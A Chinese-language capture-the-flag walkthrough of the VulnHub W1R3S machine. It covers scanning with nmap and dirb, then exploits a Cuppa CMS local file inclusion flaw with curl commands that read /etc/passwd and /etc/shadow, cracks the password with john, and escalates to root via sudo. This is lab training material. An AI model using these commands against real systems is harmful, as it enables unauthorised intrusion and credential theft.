时间:2021.2.17
靶场信息:
地址:https://www.vulnhub.com/entry/w1r3s-101,220/
发布日期:2018年2月5日
目标:得到root权限&找到flag
一、信息收集
1、获取靶机IP地址
nmap -sP 192.168.137.0/24
由探测的结果可知,靶机的IP为192.168.137.133
2、扫描开放的端口和服务
nmap -sS -sV -T5 -A -p- 192.168.137.133
得到开放的端口信息:
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
3、网站信息收集
没什么有用的信息,先用dirb爆破一下目录
找到了几个重要的目录,/administrator、/installation 和 /wordpress /,先访问http://192.168.137.133/administrator/installation/,发现这个是Cuppa CMS的安装设置
二、漏洞探测
那么我们就百度搜索一下这个cms是否存在可以利用的漏洞
这个点进去看看,发现该CMS存在一个本地文件包含的漏洞
具体参考:
[Cuppa] https://www.exploit-db.com/exploits/25971三、漏洞利用
根据上面的方法,发现读取不到
那就使用curl来利用LFI漏洞获取/etc/password文件
curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.137.133/administrator/alerts/alertConfigField.php[Curl详解] https://www.ruanyifeng.com/blog/2019/09/curl-reference.html
找到了一个用户w1r3s,然后同样的方法读取/etc/shadow
curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.137.133/administrator/alerts/alertConfigField.php
找到了用户w1r3s的salt密码,我们用john破解此密码
用户名:w1r3s
密码:computer
之前扫描到开放了22号端口,我们ssh登录
四、提权
发现可以sudo提权,然后查看flag
总结
了解了Cuppa CMS的本地文件包含漏洞的原理以及如何利用